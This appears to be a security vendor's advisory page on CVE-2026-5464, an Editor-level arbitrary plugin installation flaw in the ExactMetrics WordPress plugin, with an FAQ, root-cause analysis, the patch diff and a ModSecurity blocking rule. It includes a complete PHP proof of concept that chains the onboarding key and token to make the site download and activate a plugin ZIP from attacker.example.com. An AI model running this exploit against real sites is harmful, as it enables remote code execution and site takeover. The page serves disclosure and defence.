What is CVE-2026-5464?

CVE-2026-5464 is a high-severity vulnerability in the ExactMetrics Google Analytics Dashboard for WordPress plugin, allowing authenticated users with Editor-level access or higher to install and activate arbitrary plugins from attacker-controlled URLs. This can lead to Remote Code Execution on the affected WordPress site.

How does this vulnerability work?

The vulnerability exploits the exposure of the ‘onboarding_key’ transient to users with the ‘exactmetrics_view_dashboard’ capability. Attackers can use this key to obtain a one-time hash token, which is then used to call an AJAX endpoint that lacks proper authorization checks, allowing arbitrary plugin installation.

Who is affected by CVE-2026-5464?

Any WordPress site using the ExactMetrics Google Analytics Dashboard plugin version 9.1.2 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log into your WordPress admin panel, navigate to the ‘Plugins’ section, and look for the ExactMetrics Google Analytics Dashboard plugin. If the version is 9.1.2 or earlier, your site is vulnerable.

How can I fix this vulnerability?

The vulnerability has been patched in version 9.1.3 of the ExactMetrics plugin. Update the plugin to the latest version through the WordPress admin panel to close the vulnerability and enhance security.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the ExactMetrics plugin until the update can be applied. Additionally, restrict access to the WordPress admin area to trusted users only to reduce the risk of exploitation.

What does a CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that exploitation could lead to significant impact, including complete compromise of the WordPress site, making it critical to address promptly.

What is the proof of concept for CVE-2026-5464?

The proof of concept demonstrates how an authenticated attacker can exploit the vulnerability by logging in with Editor credentials, obtaining the onboarding key, and then making a crafted request to install a malicious plugin. This illustrates the steps needed to exploit the vulnerability effectively.

What are the implications of successful exploitation?

Successful exploitation of this vulnerability can lead to the installation of malicious plugins, which may execute arbitrary PHP code, create backdoors, extract sensitive data, or modify site content. This can result in a complete compromise of the WordPress site.

How can I protect my WordPress site from similar vulnerabilities?

To protect your WordPress site, regularly update all plugins and themes, use strong user access controls, and limit the number of users with elevated privileges. Implement security plugins that monitor for unusual activity and vulnerabilities.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately take it offline, change all passwords, and review user accounts for unauthorized access. Consider restoring from a clean backup and conducting a thorough security audit.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 23, 2026

CVE-2026-5464: ExactMetrics <= 9.1.2 – Authenticated (Editor+) Arbitrary Plugin Installation/Activation via exactmetrics_connect_process (google-analytics-dashboard-for-wp)

CVE ID CVE-2026-5464

Plugin google-analytics-dashboard-for-wp

Severity High (CVSS 7.2)

CWE 862

Vulnerable Version 9.1.2

Patched Version 9.1.3

Disclosed April 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5464:
This vulnerability allows authenticated attackers with Editor-level access or above to install and activate arbitrary WordPress plugins from attacker-controlled URLs, leading to Remote Code Execution. The affected component is the ExactMetrics Google Analytics Dashboard plugin for WordPress, version 9.1.2 and earlier. The CVSS score is 7.2.

The root cause lies in the authorization chain for plugin installation. The plugin exposes the ‘onboarding_key’ transient to any user with ‘exactmetrics_view_dashboard’ capability via the reports page. This key is the sole gate for the ‘/wp-json/exactmetrics/v1/onboarding/connect-url’ REST endpoint, which returns a one-time hash (OTH) token. The OTH token is then the only credential checked by the ‘exactmetrics_connect_process’ AJAX endpoint (hook: wp_ajax_nopriv_exactmetrics_connect_process, located in connect.php line 27). This AJAX endpoint has no capability check, no nonce verification, and accepts an arbitrary plugin ZIP URL via the ‘file’ parameter (connect.php line 142). The vulnerable code path is: reports page => onboarding_key transient => REST endpoint => OTH token => AJAX endpoint with file parameter.

Exploitation proceeds in several steps. First, the attacker accesses the reports page (e.g., /wp-admin/admin.php?page=exactmetrics_reports) to obtain the onboarding key from the JavaScript object (exactmetrics.wizard_url). Second, the attacker makes a POST request to /wp-json/exactmetrics/v1/onboarding/connect-url with the onboarding key to receive a one-time hash (OTH). Third, the attacker crafts a POST request to /wp-admin/admin-ajax.php with action=exactmetrics_connect_process, oth=, and file=. The plugin downloads and activates the ZIP, giving the attacker arbitrary code execution on the WordPress server.

The patch introduces multiple authorization checks. In connect.php, the AJAX handler is changed from ‘wp_ajax_nopriv_exactmetrics_connect_process’ to ‘wp_ajax_exactmetrics_connect_process’ (line 27), restricting it to authenticated users only. Additionally, a capability check is added at line 144: ‘if ( ! exactmetrics_can_install_plugins() )’ before processing the request. In class-exactmetrics-onboarding.php (lines 122-129), the REST endpoint now validates that the user who generated the onboarding key has plugin installation capability. The wizard_url is also conditionalized based on exactmetrics_can_install_plugins() in admin-assets.php (lines 288, 932), preventing the onboarding key from being exposed to users who cannot install plugins.

Successful exploitation results in arbitrary plugin installation and activation. Since plugins can execute arbitrary PHP code, this escalates to Remote Code Execution (RCE) on the WordPress server. An attacker could install a malicious plugin that creates a backdoor, extracts database contents, modifies site content, or executes system commands. The impact is complete compromise of the WordPress site and its data.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/google-analytics-dashboard-for-wp/gadwp.php
+++ b/google-analytics-dashboard-for-wp/gadwp.php
@@ -5,7 +5,7 @@
  * Plugin URI: https://exactmetrics.com
  * Description: Displays Google Analytics Reports and Real-Time Statistics in your Dashboard. Automatically inserts the tracking code in every page of your website.
  * Author: ExactMetrics
- * Version: 9.1.2
+ * Version: 9.1.3
  * Requires at least: 5.6.0
  * Requires PHP: 7.2
  * Author URI: https://exactmetrics.com/lite/?utm_source=liteplugin&utm_medium=pluginheader&utm_campaign=authoruri&utm_content=7%2E0%2E0
@@ -55,7 +55,7 @@
 	 * @var string $version Plugin version.
 	 */

-	public $version = '9.1.2';
+	public $version = '9.1.3';

 	/**
 	 * Plugin file.
--- a/google-analytics-dashboard-for-wp/includes/admin/admin-assets.php
+++ b/google-analytics-dashboard-for-wp/includes/admin/admin-assets.php
@@ -285,7 +285,7 @@
 					'auth'                 => $auth_data,
 					'authed'               => $site_auth || $ms_auth, // Boolean for admin bar compatibility
 					'plugin_version'       => EXACTMETRICS_VERSION,
-					'wizard_url'           => exactmetrics_get_onboarding_url(),
+					'wizard_url'           => exactmetrics_can_install_plugins() ? exactmetrics_get_onboarding_url() : '',
 					'rest_url'             => get_rest_url(),
 					'rest_nonce'           => wp_create_nonce( 'wp_rest' ),
 					// Direct API access (bypasses WordPress for performance).
@@ -929,7 +929,7 @@
 				'bearer_expires'     => $bearer_expires,
 				// Sample data mode: when true, frontend should bypass direct API and use WP AJAX for sample data.
 				'sample_data_enabled' => apply_filters( 'exactmetrics_sample_data_enabled', false ),
-				'wizard_url'         => is_admin() ? exactmetrics_get_onboarding_url() : '',
+				'wizard_url'         => exactmetrics_can_install_plugins() ? exactmetrics_get_onboarding_url() : '',
 				'addons'             => $addons_active,
 				'addons_info'        => $addons_info,
 				'activate_nonce'     => wp_create_nonce( 'exactmetrics-activate' ),
--- a/google-analytics-dashboard-for-wp/includes/admin/class-exactmetrics-onboarding.php
+++ b/google-analytics-dashboard-for-wp/includes/admin/class-exactmetrics-onboarding.php
@@ -113,7 +113,20 @@
 		if ( empty( $provided_key ) || false === $stored_key || ! hash_equals( $stored_key, $provided_key ) ) {
 			return new WP_Error(
 				'exactmetrics_invalid_key',
-				'Invalid onboarding key',
+				esc_html__( 'Invalid onboarding key', 'google-analytics-dashboard-for-wp' ),
+				array( 'status' => 403 )
+			);
+		}
+
+		// Ensure the user who generated the key has plugin installation capability.
+		// Only enforce when the user ID transient is present; if it has been evicted
+		// from the object cache independently of the key transient, skip this check
+		// rather than blocking a legitimate upgrade flow.
+		$onboarding_user_id = exactmetrics_get_onboarding_user_id();
+		if ( $onboarding_user_id && ! exactmetrics_can_install_plugins( $onboarding_user_id ) ) {
+			return new WP_Error(
+				'exactmetrics_insufficient_permissions',
+				esc_html__( 'Insufficient permissions', 'google-analytics-dashboard-for-wp' ),
 				array( 'status' => 403 )
 			);
 		}
--- a/google-analytics-dashboard-for-wp/includes/admin/wp-site-health.php
+++ b/google-analytics-dashboard-for-wp/includes/admin/wp-site-health.php
@@ -1,49 +0,0 @@
-<?php
-
-class ExactMetrics_WP_Site_Health {
-	public function __construct() {
-		add_filter( 'site_status_tests', array( $this, 'add_tests' ) );
-	}
-
-	public function add_tests( $tests ) {
-		$tests['direct']['exactmetrics_dual_tracking'] = array(
-			'label' => __( 'ExactMetrics Dual Tracking', 'google-analytics-dashboard-for-wp' ),
-			'test'  => array( $this, 'test_dual_tracking' ),
-		);
-
-		return $tests;
-	}
-
-	public function test_dual_tracking() {
-
-		$has_v4_id = strlen( exactmetrics_get_v4_id() ) > 0;
-
-		if ( $has_v4_id ) {
-			return false;
-		}
-
-		$setup_link = add_query_arg( array(
-			'page'                      => 'exactmetrics_settings',
-			'exactmetrics-scroll'    => 'exactmetrics-dual-tracking-id',
-			'exactmetrics-highlight' => 'exactmetrics-dual-tracking-id',
-		), admin_url( 'admin.php' ) );
-
-		return array(
-			'label'       => __( 'Enable Google Analytics 4', 'google-analytics-dashboard-for-wp' ),
-			'status'      => 'critical',
-			'badge'       => array(
-				'label' => __( 'ExactMetrics', 'google-analytics-dashboard-for-wp' ),
-				'color' => 'blue',
-			),
-			'description' => __( 'Starting July 1, 2023, Google's Universal Analytics (GA3) will not accept any new traffic or event data. Upgrade to Google Analytics 4 today to be prepared for the sunset.', 'google-analytics-dashboard-for-wp' ),
-			'actions'     => sprintf(
-				'<p><a href="%s" target="_blank" rel="noopener noreferrer">%s</a></p>',
-				$setup_link,
-				__( 'Set Up Dual Tracking', 'google-analytics-dashboard-for-wp' )
-			),
-			'test'        => 'exactmetrics_dual_tracking',
-		);
-	}
-}
-
-new ExactMetrics_WP_Site_Health();
--- a/google-analytics-dashboard-for-wp/includes/connect.php
+++ b/google-analytics-dashboard-for-wp/includes/connect.php
@@ -24,7 +24,7 @@
 	public function hooks() {

 		add_action( 'wp_ajax_exactmetrics_connect_url', array( $this, 'generate_connect_url' ) );
-		add_action( 'wp_ajax_nopriv_exactmetrics_connect_process', array( $this, 'process' ) );
+		add_action( 'wp_ajax_exactmetrics_connect_process', array( $this, 'process' ) );
 	}

 	/**
@@ -141,6 +141,11 @@
 			'</a>'
 		);

+		// Check for permissions.
+		if ( ! exactmetrics_can_install_plugins() ) {
+			wp_send_json_error( $error );
+		}
+
 		// verify params present (oth & download link).
 		$post_oth = ! empty( $_REQUEST['oth'] ) ? sanitize_text_field($_REQUEST['oth']) : '';
 		$post_url = ! empty( $_REQUEST['file'] ) ? sanitize_url($_REQUEST['file']) : '';
--- a/google-analytics-dashboard-for-wp/includes/frontend/frontend.php
+++ b/google-analytics-dashboard-for-wp/includes/frontend/frontend.php
@@ -161,6 +161,23 @@
 }

 /**
+ * Whether the built React admin bar bundle exists on disk.
+ *
+ * The top-level "Insights" admin bar button is interactive only when the
+ * React app is enqueued and mounts. If the bundle is missing (e.g. a
+ * release packaging gap), the rendered link has no click handler and
+ * appears broken to users. This helper lets callers gate on availability.
+ *
+ * @return bool
+ */
+function exactmetrics_admin_bar_assets_available() {
+	$version    = exactmetrics_is_pro_version() ? 'pro' : 'lite';
+	$asset_file = EXACTMETRICS_PLUGIN_DIR . "{$version}/assets/admin-bar/index.asset.php";
+
+	return file_exists( $asset_file );
+}
+
+/**
  * Add an admin bar menu item on the frontend.
  *
  * @return void
@@ -171,13 +188,26 @@
 		return;
 	}

+	// If the React admin bar bundle is missing, skip adding the button —
+	// otherwise it renders as an inert link and looks broken. The
+	// "Insights" entry under wp-logo (see em-admin.php) still works.
+	if ( ! exactmetrics_admin_bar_assets_available() ) {
+		return;
+	}
+
 	global $wp_admin_bar;

+	// Fallback href so the button degrades to navigation if the React
+	// app fails to mount for any reason (JS error, CSP, extension).
+	$reports_url = is_network_admin()
+		? add_query_arg( 'page', 'exactmetrics_overview_report', network_admin_url( 'admin.php' ) )
+		: add_query_arg( 'page', 'exactmetrics_reports', admin_url( 'admin.php' ) );
+
 	$args = array(
 		'id'    => 'exactmetrics_frontend_button',
 		'title' => '<span class="ab-icon dashicons-before dashicons-chart-bar"></span> ExactMetrics',
 		// Maybe allow translation?
-		'href'  => '#',
+		'href'  => $reports_url,
 	);

 	if ( method_exists( $wp_admin_bar, 'add_menu' ) ) {
@@ -214,7 +244,7 @@
 	$version = exactmetrics_is_pro_version() ? 'pro' : 'lite';
 	$asset_file = EXACTMETRICS_PLUGIN_DIR . "{$version}/assets/admin-bar/index.asset.php";

-	if (!file_exists($asset_file)) {
+	if ( ! exactmetrics_admin_bar_assets_available() ) {
 		return;
 	}

@@ -249,40 +279,52 @@
 		plugin_dir_path( EXACTMETRICS_PLUGIN_FILE ) . $version . '/languages'
 	);

-	// Localize data (same structure as Vue version for compatibility)
-	$page_title = is_singular() ? get_the_title() : exactmetrics_get_page_title();
-	$site_auth = ExactMetrics()->auth->get_viewname();
-	$ms_auth = is_multisite() && ExactMetrics()->auth->get_network_viewname();
-
-	// Check if any of the other admin scripts are enqueued, if so, use their object.
-	if ( ! wp_script_is( 'exactmetrics-vue-script' ) && ! wp_script_is( 'exactmetrics-vue-reports' ) && ! wp_script_is( 'exactmetrics-vue-widget' ) && ! wp_script_is( 'exactmetrics-vue3-custom-dashboard' ) ) {
-		$reports_url = is_network_admin() ? add_query_arg( 'page', 'exactmetrics_overview_report', network_admin_url( 'admin.php' ) ) : add_query_arg( 'page', 'exactmetrics_reports', admin_url( 'admin.php' ) );
-		wp_localize_script(
-			'exactmetrics-admin-bar',
-			'exactmetrics',
-			array(
-				'ajax'                 => admin_url( 'admin-ajax.php' ),
-				'nonce'                => wp_create_nonce( 'mi-admin-nonce' ),
-				'network'              => is_network_admin(),
-				'assets'               => plugins_url( $version . '/assets/admin-bar', EXACTMETRICS_PLUGIN_FILE ),
-				'addons_url'           => is_multisite() ? network_admin_url( 'admin.php?page=exactmetrics_network#/addons' ) : admin_url( 'admin.php?page=exactmetrics_settings#/addons' ),
-				'page_id'              => is_singular() ? get_the_ID() : false,
-				'page_title'           => $page_title,
-				'plugin_version'       => EXACTMETRICS_VERSION,
-				'shareasale_id'        => exactmetrics_get_shareasale_id(),
-				'shareasale_url'       => exactmetrics_get_shareasale_url( exactmetrics_get_shareasale_id(), '' ),
-				'is_admin'             => is_admin(),
-				'reports_url'          => $reports_url,
-				'authed'               => $site_auth || $ms_auth,
-				'auth_connect_url'     => is_network_admin() ? network_admin_url( 'index.php?page=exactmetrics-onboarding' ) : admin_url( 'index.php?page=exactmetrics-onboarding' ),
-				'getting_started_url'  => is_multisite() ? network_admin_url( 'admin.php?page=exactmetrics_network#/about/getting-started' ) : admin_url( 'admin.php?page=exactmetrics_settings#/about/getting-started' ),
-				'wizard_url'           => is_network_admin() ? network_admin_url( 'index.php?page=exactmetrics-onboarding' ) : admin_url( 'index.php?page=exactmetrics-onboarding' ),
-				'roles_manage_options' => exactmetrics_get_manage_options_roles(),
-				'user_roles'           => $current_user->roles,
-				'roles_view_reports'   => exactmetrics_get_option('view_reports'),
-			)
-		);
+	// Skip localizing the shared `exactmetrics` global if another MI app already owns it —
+	// otherwise this admin-bar payload would clobber config like relay_api_url / license / reporting_api.
+	$competing_handles = array(
+		'exactmetrics-vue-script',
+		'exactmetrics-vue-reports',
+		'exactmetrics-vue-widget',
+		'exactmetrics-vue3-custom-dashboard',
+		'exactmetrics-vue3-reports',
+	);
+
+	foreach ( $competing_handles as $handle ) {
+		if ( wp_script_is( $handle ) ) {
+			return;
+		}
 	}
+
+	// Localize data (same structure as Vue version for compatibility)
+	$page_title  = is_singular() ? get_the_title() : exactmetrics_get_page_title();
+	$site_auth   = ExactMetrics()->auth->get_viewname();
+	$ms_auth     = is_multisite() && ExactMetrics()->auth->get_network_viewname();
+	$reports_url = is_network_admin() ? add_query_arg( 'page', 'exactmetrics_overview_report', network_admin_url( 'admin.php' ) ) : add_query_arg( 'page', 'exactmetrics_reports', admin_url( 'admin.php' ) );
+	wp_localize_script(
+		'exactmetrics-admin-bar',
+		'exactmetrics',
+		array(
+			'ajax'                 => admin_url( 'admin-ajax.php' ),
+			'nonce'                => wp_create_nonce( 'mi-admin-nonce' ),
+			'network'              => is_network_admin(),
+			'assets'               => plugins_url( $version . '/assets/admin-bar', EXACTMETRICS_PLUGIN_FILE ),
+			'addons_url'           => is_multisite() ? network_admin_url( 'admin.php?page=exactmetrics_network#/addons' ) : admin_url( 'admin.php?page=exactmetrics_settings#/addons' ),
+			'page_id'              => is_singular() ? get_the_ID() : false,
+			'page_title'           => $page_title,
+			'plugin_version'       => EXACTMETRICS_VERSION,
+			'shareasale_id'        => exactmetrics_get_shareasale_id(),
+			'shareasale_url'       => exactmetrics_get_shareasale_url( exactmetrics_get_shareasale_id(), '' ),
+			'is_admin'             => is_admin(),
+			'reports_url'          => $reports_url,
+			'authed'               => $site_auth || $ms_auth,
+			'auth_connect_url'     => is_network_admin() ? network_admin_url( 'index.php?page=exactmetrics-onboarding' ) : admin_url( 'index.php?page=exactmetrics-onboarding' ),
+			'getting_started_url'  => is_multisite() ? network_admin_url( 'admin.php?page=exactmetrics_network#/about/getting-started' ) : admin_url( 'admin.php?page=exactmetrics_settings#/about/getting-started' ),
+			'wizard_url'           => is_network_admin() ? network_admin_url( 'index.php?page=exactmetrics-onboarding' ) : admin_url( 'index.php?page=exactmetrics-onboarding' ),
+			'roles_manage_options' => exactmetrics_get_manage_options_roles(),
+			'user_roles'           => $current_user->roles,
+			'roles_view_reports'   => exactmetrics_get_option('view_reports'),
+		)
+	);
 }

 add_action( 'wp_enqueue_scripts', 'exactmetrics_frontend_admin_bar_scripts' );
--- a/google-analytics-dashboard-for-wp/includes/ppc/google/class-exactmetrics-google-ads.php
+++ b/google-analytics-dashboard-for-wp/includes/ppc/google/class-exactmetrics-google-ads.php
@@ -167,6 +167,12 @@
 	public function reset_experience() {
 		check_ajax_referer('mi-admin-nonce', 'nonce');

+		if (! current_user_can('exactmetrics_save_settings')) {
+			wp_send_json_error(array(
+				'message' => __('You do not have permission to reset the Google Ads experience.', 'google-analytics-dashboard-for-wp'),
+			));
+		}
+
 		self::clear_data();

 		wp_send_json_success(array(
@@ -244,6 +250,12 @@
 	{
 		check_ajax_referer('mi-admin-nonce', 'nonce');

+		if (! current_user_can('exactmetrics_save_settings')) {
+			wp_send_json_error(array(
+				'message' => __('You do not have permission to retrieve the Google Ads access token.', 'google-analytics-dashboard-for-wp'),
+			));
+		}
+
 		$access_token_result = $this->get_access_token();

 		if (is_wp_error($access_token_result)) {
--- a/google-analytics-dashboard-for-wp/lite/assets/admin-bar/index.asset.php
+++ b/google-analytics-dashboard-for-wp/lite/assets/admin-bar/index.asset.php
@@ -0,0 +1 @@
+<?php return array('dependencies' => array('react-jsx-runtime', 'wp-element', 'wp-i18n'), 'version' => '60524db626247a37b49b');
--- a/google-analytics-dashboard-for-wp/lite/includes/popular-posts/class-popular-posts-widget.php
+++ b/google-analytics-dashboard-for-wp/lite/includes/popular-posts/class-popular-posts-widget.php
@@ -121,7 +121,7 @@
 			$html .= '<a href="' . esc_url($post['link']) . '">';
 			if ( ! empty( $theme_styles['image'] ) && ! empty( $post['image'] ) ) {
 				$html .= '<div class="exactmetrics-widget-popular-posts-image">';
-				$html .= '<img src="' . esc_url($post['image']) . '" srcset=" ' . esc_attr($post['srcset']) . ' " alt="' . esc_attr( $post['title'] ) . '" />';
+				$html .= '<img src="' . esc_url($post['image']) . '" srcset=" ' . esc_attr($post['srcset']) . ' " alt="' . esc_attr( wp_strip_all_tags( $post['title'] ) ) . '" />';
 				$html .= '</div>';
 			}
 			$html .= '<div class="exactmetrics-widget-popular-posts-text">';
@@ -132,7 +132,7 @@
 			}
 			$html .= '<span class="exactmetrics-widget-popular-posts-title" ';
 			$html .= ! empty( $this->get_element_style( $theme, 'title', $atts ) ) ? 'style="' . esc_attr( $this->get_element_style( $theme, 'title', $atts ) ) . '"' : '';
-			$html .= '>' . esc_html( $post['title'] ) . '</span>';
+			$html .= '>' . wp_kses_post( $post['title'] ) . '</span>';
 			$html .= '</div>'; // exactmetrics-widget-popular-posts-text.
 			$html .= '</a>';
 			$html .= '</li>';

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-5464
# Block exploitation of ExactMetrics arbitrary plugin installation via AJAX endpoint
# Matches admin-ajax.php with action=exactmetrics_connect_process and file parameter containing a remote URL
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20265464,phase:2,deny,status:403,chain,msg:'CVE-2026-5464 blocker - ExactMetrics arbitrary plugin install via AJAX',severity:'CRITICAL',tag:'CVE-2026-5464'"
SecRule ARGS_POST:action "@streq exactmetrics_connect_process" "chain"
SecRule ARGS_POST:file "@rx ^https?://" "t:none,deny,status:403"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-5464 - ExactMetrics <= 9.1.2 - Authenticated (Editor+) Arbitrary Plugin Installation/Activation

define('TARGET_URL', 'http://example.com'); // Change to target WordPress URL
define('USERNAME', 'editor_user'); // WordPress username with Editor role
define('PASSWORD', 'editor_password'); // WordPress password

// Step 1: Login and get WordPress cookies/nonce
$login_url = TARGET_URL . '/wp-login.php';
$ch = curl_init($login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => USERNAME,
    'pwd' => PASSWORD,
    'wp-submit' => 'Log In',
    'redirect_to' => TARGET_URL . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Access reports page to obtain onboarding key from wizard_url
$reports_url = TARGET_URL . '/wp-admin/admin.php?page=exactmetrics_reports';
$ch = curl_init($reports_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Extract wizard_url from JavaScript object (contains onboarding_key)
preg_match('/"wizard_url":"([^"]+|)"/', $response, $matches);
if (empty($matches[1])) {
    die('Error: Could not extract wizard_url from reports page. Ensure user has exactmetrics_view_dashboard capability.');
}
$wizard_url = html_entity_decode($matches[1]);
echo "Wizard URL: $wizard_urln";

// Parse onboarding_key from wizard_url query parameter
parse_str(parse_url($wizard_url, PHP_URL_QUERY), $query_params);
$onboarding_key = $query_params['exactmetrics_onboarding_key'] ?? '';
if (empty($onboarding_key)) {
    die('Error: Could not extract onboarding_key from wizard_url.');
}
echo "Onboarding Key: $onboarding_keyn";

// Step 3: Call REST endpoint to get OTH token
$rest_url = TARGET_URL . '/wp-json/exactmetrics/v1/onboarding/connect-url';
$ch = curl_init($rest_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['onboarding_key' => $onboarding_key]));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "REST response: $responsen";
if ($http_code !== 200) {
    die('Error: REST endpoint did not return 200. HTTP code: ' . $http_code);
}

$json = json_decode($response, true);
$oth = $json['data']['secret'] ?? '';
if (empty($oth)) {
    die('Error: Could not extract OTH from REST response.');
}
echo "OTH Token: $othn";

// Step 4: Trigger AJAX endpoint to install malicious plugin
$ajax_url = TARGET_URL . '/wp-admin/admin-ajax.php';
$payload_url = 'http://attacker.example.com/malicious-plugin.zip'; // Change to attacker-controlled URL
$post_fields = [
    'action' => 'exactmetrics_connect_process',
    'oth' => $oth,
    'file' => $payload_url
];

$ch = curl_init($ajax_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

echo "AJAX response: $responsen";
// If successful, the malicious plugin is now installed and activated

// Cleanup
unlink('/tmp/cookies.txt');

Frequently Asked Questions

What is CVE-2026-5464?
Overview of the vulnerability
CVE-2026-5464 is a high-severity vulnerability in the ExactMetrics Google Analytics Dashboard for WordPress plugin, allowing authenticated users with Editor-level access or higher to install and activate arbitrary plugins from attacker-controlled URLs. This can lead to Remote Code Execution on the affected WordPress site.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exploits the exposure of the ‘onboarding_key’ transient to users with the ‘exactmetrics_view_dashboard’ capability. Attackers can use this key to obtain a one-time hash token, which is then used to call an AJAX endpoint that lacks proper authorization checks, allowing arbitrary plugin installation.
Who is affected by CVE-2026-5464?
Identifying vulnerable installations
Any WordPress site using the ExactMetrics Google Analytics Dashboard plugin version 9.1.2 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, log into your WordPress admin panel, navigate to the ‘Plugins’ section, and look for the ExactMetrics Google Analytics Dashboard plugin. If the version is 9.1.2 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Updating the affected plugin
The vulnerability has been patched in version 9.1.3 of the ExactMetrics plugin. Update the plugin to the latest version through the WordPress admin panel to close the vulnerability and enhance security.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the ExactMetrics plugin until the update can be applied. Additionally, restrict access to the WordPress admin area to trusted users only to reduce the risk of exploitation.
What does a CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that exploitation could lead to significant impact, including complete compromise of the WordPress site, making it critical to address promptly.
What is the proof of concept for CVE-2026-5464?
Demonstration of the vulnerability
The proof of concept demonstrates how an authenticated attacker can exploit the vulnerability by logging in with Editor credentials, obtaining the onboarding key, and then making a crafted request to install a malicious plugin. This illustrates the steps needed to exploit the vulnerability effectively.
What are the implications of successful exploitation?
Potential consequences
Successful exploitation of this vulnerability can lead to the installation of malicious plugins, which may execute arbitrary PHP code, create backdoors, extract sensitive data, or modify site content. This can result in a complete compromise of the WordPress site.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To protect your WordPress site, regularly update all plugins and themes, use strong user access controls, and limit the number of users with elevated privileges. Implement security plugins that monitor for unusual activity and vulnerabilities.
What should I do if I suspect my site has been compromised?
Response to potential breaches
If you suspect your site has been compromised, immediately take it offline, change all passwords, and review user accounts for unauthorized access. Consider restoring from a clean backup and conducting a thorough security audit.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations